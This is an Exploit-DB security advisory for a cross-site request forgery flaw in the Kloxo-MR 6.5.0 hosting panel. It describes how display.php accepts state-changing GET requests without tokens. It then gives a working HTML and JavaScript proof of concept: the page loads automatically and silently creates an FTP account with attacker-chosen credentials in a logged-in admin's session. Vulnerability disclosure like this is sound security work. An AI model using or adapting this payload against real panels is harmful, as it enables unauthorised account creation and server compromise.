Kloxo-MR 6.5.0 – Cross-Site Request Forgery

  • Author: Necmettin COSKUN
    Date: 2014-04-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/32666/

# Exploit Title   : Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage : https://github.com/mustafaramadhan/kloxo/tree/dev
# Version         : Kloxo-MR 6.5.0.f-2014020301
# Tested on       : CentOS 6.4
# Exploit Author  : Necmettin COSKUN => @babayarisi
# Blog            : http://www.ncoskun.com http://www.grisapka.org
# Discovery date  : 03/12/2014
# CVE             : N/A
     
Kloxo-MR is a special edition (fork) of Kloxo with many features that do not exist in the official Kloxo release (6.1.12+). The fork is named Kloxo-MR, meaning "Kloxo fork by Mustafa Ramadhan".

CSRF Vulnerability
================

Vulnerability
================
Like Kloxo stable, Kloxo-MR drives most of its administrative actions through GET- and POST-based forms handled by display.php. Some inputs are escaped against special characters, but none of the forms carries a CSRF token or any other per-session secret, and state-changing actions (frm_action=add, delete, ...) are accepted over a plain GET request.
A remote attacker who gets a logged-in panel user to open a page under the attacker's control can therefore issue these requests in the victim's session, because the browser attaches the panel's session cookie to the forged request automatically. That is enough to add or delete MySQL users, create or delete subdomains, or add or delete FTP accounts.
    
PoC Exploit
================

The page below only has to be loaded by a user who is logged in to the Kloxo-MR panel (port 7778) in the same browser: the forged <img> request is sent with the panel's session cookie and display.php creates the FTP account.

<html>
<head>
<title>Kloxo-MR demo</title>
<script type="text/javascript">
function yurudi(){
	///////////////////////////////////////////////////////////
	//Kloxo-MR 6.5.0 CSRF Vulnerability                      //
	//Author:Necmettin COSKUN => twitter.com/@babayarisi     //
	//Blog: http://www.ncoskun.com | http://www.grisapka.org //
	///////////////////////////////////////////////////////////
	//Remote host (the Kloxo-MR panel)
	var host="victim.com";
	//New FTP username
	var username="demouser";
	//New FTP password
	var pass="12345678";
	//Home directory of the new FTP user; created under the admin's directory as /admin/<dir>
	var dir="demodirectory";
	//Change http to https if the panel is served over TLS
	var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";

	//Point the image at the forged URL; the browser issues it as a GET with the victim's cookies
	document.getElementById('demoexploit').src=urlson;
}
</script>
</head>
<body onload="yurudi();">
<!-- placeholder src; replaced with the forged URL once the page has loaded -->
<img id="demoexploit" src="https://www.exploit-db.com/exploits/32666/">
</body>
</html>
     
     
    Discovered by:
    ================
    Necmettin COSKUN|GrisapkaGuvenlikGrubu|4ewa2getha!